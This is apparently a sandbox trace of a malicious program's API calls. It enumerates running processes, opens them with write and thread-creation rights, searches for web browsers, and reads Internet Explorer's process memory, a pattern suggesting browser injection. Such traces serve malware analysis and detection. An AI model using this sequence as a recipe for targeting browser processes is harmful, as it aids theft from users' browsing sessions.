	[0224.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.963] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.963] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.963] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.963] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5be8
	[0224.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.964] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.964] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.965] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.965] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5bec
	[0224.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.966] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.967] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.967] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.967] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0224.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5bf0
	[0224.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.969] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0224.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.969] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.969] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0224.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.970] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0224.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5bf4
	[0224.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.971] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.971] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.971] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.971] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.972] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0224.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5bf8
	[0224.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.972] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0224.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.973] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.973] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0224.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.973] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.974] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0224.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0224.974] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0224.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5bfc
	[0224.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.975] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0224.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.976] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.976] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0224.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.977] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0224.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5c00
	[0224.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.978] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0224.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.979] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.979] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0224.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.979] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0224.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5c04
	[0224.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.980] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0224.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.980] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.981] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0224.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.981] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.981] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0224.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5c08
	[0224.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.982] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0225.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.031] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.032] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0225.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.032] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.032] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0225.033] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5c0c
	[0225.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.033] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0225.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.034] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.034] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0225.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.035] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0225.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5c10
	[0225.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.036] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0225.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.036] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.036] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0225.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.037] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0225.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5c14
	[0225.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.038] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0225.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.038] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.038] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0225.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.039] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0225.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5c18
	[0225.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.040] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0225.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.041] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.041] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0225.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.042] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.042] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0225.043] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5c1c
	[0225.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.043] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0225.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.043] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.043] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0225.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.044] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.044] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0225.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5c20
	[0225.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.045] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0225.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.045] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.045] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0225.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.045] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.045] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0225.093] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5c24
	[0225.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.094] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0225.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.094] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.095] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0225.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.095] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.095] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0225.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5c28
	[0225.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.096] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0225.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.097] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.097] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0225.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.098] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.099] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0225.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5c2c
	[0225.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.100] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0225.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.100] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.100] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0225.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.101] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.101] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0225.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5c30
	[0225.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.102] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0225.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.103] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.103] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0225.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.104] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.104] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0225.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5c34
	[0225.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.105] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0225.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.106] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.106] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0225.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.107] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.107] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0225.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5c38
	[0225.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.108] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0225.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.108] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0225.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.108] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0225.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.109] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.109] NtQueryInformationProcess (in: ProcessHandle=0x5c38, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0225.109] ReadProcessMemory (in: hProcess=0x5c38, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0225.109] ReadProcessMemory (in: hProcess=0x5c38, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0225.110] ReadProcessMemory (in: hProcess=0x5c38, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0225.110] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0225.110] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0225.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5c3c
	[0225.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.111] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0225.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.111] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0225.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.111] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0225.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.111] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.112] NtQueryInformationProcess (in: ProcessHandle=0x5c3c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0225.112] ReadProcessMemory (in: hProcess=0x5c3c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0225.112] ReadProcessMemory (in: hProcess=0x5c3c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
